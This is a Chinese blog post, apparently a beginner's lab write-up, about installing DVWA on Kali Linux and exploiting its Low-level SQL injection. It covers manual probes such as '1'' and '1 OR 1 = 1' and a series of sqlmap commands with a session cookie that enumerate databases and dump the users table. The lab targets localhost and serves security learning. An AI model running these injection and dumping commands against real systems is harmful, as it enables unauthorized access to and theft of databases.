DVWA靶场上Low级别SQL注入漏洞学习

WangX-西石油2026-05-28 10:13

做了几年网络运维,最近想要从0开始系统的学习网络安全技术。于是安装了虚拟机和kali系统,从头开始学习。Kali Linux 官方软件源已经收录了 DVWA(Damn Vulnerable Web Application),可以直接通过 apt 命令一键安装。

##(一) Kali Linux系统上安装DVWA

1.打开终端,执行如下命令:

bash 复制代码 
sudo apt update
sudo apt install dvwa

2.启动环境:

bash 复制代码 
sudo dvwa-start

3.访问并初始化

打开浏览器,访问 http://127.0.0.1/dvwa/http://localhost/dvwa/。

点击页面底部的 Create / Reset Database 按钮。

使用默认账号登录:Username: admin,Password: password。

4.设置难度

登录后,在左侧菜单点击 DVWA Security,将安全级别设为 Low(初学者建议),点击 Submit 保存。

(二)手动测试漏洞

输入1'进行测试,如果页面报错,说明'被传进去,并破坏了SQL查询结构。如果页面正常显示,说明可能被过滤或者转义了。(可能存在漏洞,也可能没有漏洞)

1、输入1'进行测试时,如果报错分三种情况:

(1)后台代码为'id'(字符串型注入);

(2)后台代码为id(数字型注入);

(3)其他注入漏洞(盲注等)。

2、输入1'进行测试时,如果页面正常显示,可以尝试1 OR 1 = 1(可能存在盲注,盲注如果手动测试只能猜。比如通过折半查找猜数据库名称。)

结合测试的流程和可能出现的结果,根据自身理解画了一个逻辑图如下:

(三)用sqlmap工具测试

因为DVWA需要登录,所以利用sqlmap工具的时候需要先获得此时页面的cookie。

1、具体操作如下:

刷新页面:在 DVWA 的 SQL Injection 页面,按 F12 刷新一下。

找到正确的请求:在 Network 标签里,点击第一个以 sqli 开头的请求(通常是 GET sqli)。

查看请求头:在弹出的右侧面板中,找到 Request Headers 部分。

会看到类似这样的内容:

Cookie: PHPSESSID=abc123def456; security=low

把 PHPSESSID=abc123def456; security=low 完整地复制下来。

具体利用

2、利用sqlmap可以自动找出存在的注入漏洞类型,并进行利用,具体的操作步骤如下:

(1) 利用这条命令,可以自动找出存在的注入漏洞类型。一定要确保是登陆状态,如果不登陆(无?id=1&Submit=Submit)运行不成功,因为cookie是认证后的。正常的网站一般是不需要登录的。这里是在DVWA靶机上,环境必须登录。本人学习的时候登陆状态掉了,刚开始就一直不成功。

bash 复制代码 
sqlmap -u "http://127.0.0.1:42001/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="PHPSESSID=自身cookie; security=low" --batch

(2)下面这条命令是查看数据库名字的,同样需要登录平台。

bash 复制代码 
sqlmap -u "http://127.0.0.1:42001/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="PHPSESSID=自身cookie; security=low" --current-db

(3)下面这条命令可以查看数据库里有几张表(显示结果有guestbook和users)。

bash 复制代码 
sqlmap -u "http://127.0.0.1:42001/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="PHPSESSID=自身cookie; security=low" -D dvwa --tables

(4)下面这条命令可查看表users中有哪些字段,用什么类型数据进行存储。

bash 复制代码 
sqlmap -u "http://127.0.0.1:42001/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="PHPSESSID=自身cookie; security=low" -D dvwa -T users --columns

(5)下面这条命令进行数据库脱库,可将users这张表下载下来。到此已经完成了漏洞的利用。得到数据库中信息后可以进行进一步的利用。

bash 复制代码 
sqlmap -u "http://127.0.0.1:42001/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="PHPSESSID=自身cookie; security=low" -D dvwa -T users --dump
相关推荐
Chengbei112 小时前
AI赋能Chrome MCP × JS逆向Skill自动化JS逆向助力挖洞与绕过实战(小白也能学会)
javascript·人工智能·chrome·网络安全·自动化·系统安全·安全架构
Gauss松鼠会2 小时前
GaussDB(DWS) SQL性能问题案例集
java·数据库·经验分享·spring boot·后端·sql·gaussdb
雷工笔记2 小时前
SQL系列1:AI排查SQL语句中的幽灵
数据库·sql
这个DBA有点耶3 小时前
SQL语义执行:当数据库开始“理解”你的查询意图
数据库·sql·自然语言处理·创业创新·dba·程序员创富·改行学it
XLYcmy3 小时前
Agent身份与权限系统设计方案
windows·网络安全·ai·llm·飞书·api·agent
数据库小学妹3 小时前
ProxySQL选型实战:从手写读写分离到中间件的踩坑全记录
数据库·sql·中间件
一条泥憨鱼3 小时前
详解MyBatis 动态 SQL
java·数据库·sql·mysql·mybatis·动态sql
宋浮檀s15 小时前
应急响应——恶意流量&攻击行为识别
linux·运维·网络·网络安全·应急响应
BlackHeart120316 小时前
【SQL】Oracle中序列(Sequence)作为默认值引发的ORA-00979
数据库·sql·oracle
热门推荐
01GitHub 镜像站点02【AI】2026 年具身智能模型和世界模型总结03Codex 接入 DeepSeek API 完整配置文档04【踩坑记录 | 第一篇】微软商店无法使用时,如何手动安装 OpenAI Codex?附`.msix`文件系统错误解决方法05裂开!ChatGPT 居然开始要手机号验证,附详细解决方法062026年AI编程工具终极横评:Cursor vs Claude Code vs Copilot07CC-Switch & Claude 基于 Linux 服务器安装使用指南08CC-Switch 全平台下载、安装与使用全指南(Windows/macOS/Linux)09Codegraph 实战:用知识图谱让 AI 编程效率翻倍10给 Claude Code 装上“技能库”和“眼睛”:配置 Skills 与图片识别实战